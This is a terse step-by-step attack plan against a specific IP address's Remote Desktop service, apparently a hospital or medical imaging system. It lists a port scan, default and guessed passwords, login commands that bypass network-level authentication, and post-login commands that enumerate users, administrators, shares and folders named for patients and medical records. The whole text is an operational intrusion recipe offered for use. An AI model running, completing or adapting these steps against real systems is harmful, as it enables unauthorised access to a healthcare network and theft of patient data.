ATTACK 178.175.128.102 (RDP): 1. SCAN: nmap -p3389,445,139,135 178.175.128.102 -Pn 2. CREDENTIALS TO TRY: Service:Service admin:admin Administrator:(empty) pacs:pacs KBCadmin:KBC2023! Hospital2023:Hospital2023 3. COMMANDS: rdesktop -u Service -p Service 178.175.128.102 rdesktop -u admin -p admin 178.175.128.102 rdesktop -u KBCadmin -p "KBC2023!" 178.175.128.102 4. IF NLA ERROR: xfreerdp /u:admin /v:178.175.128.102 /sec:rdp /cert-ignore 5. ONCE INSIDE: whoami net users net localgroup administrators dir C:\Patients\ /s dir C:\Medical\ /s net share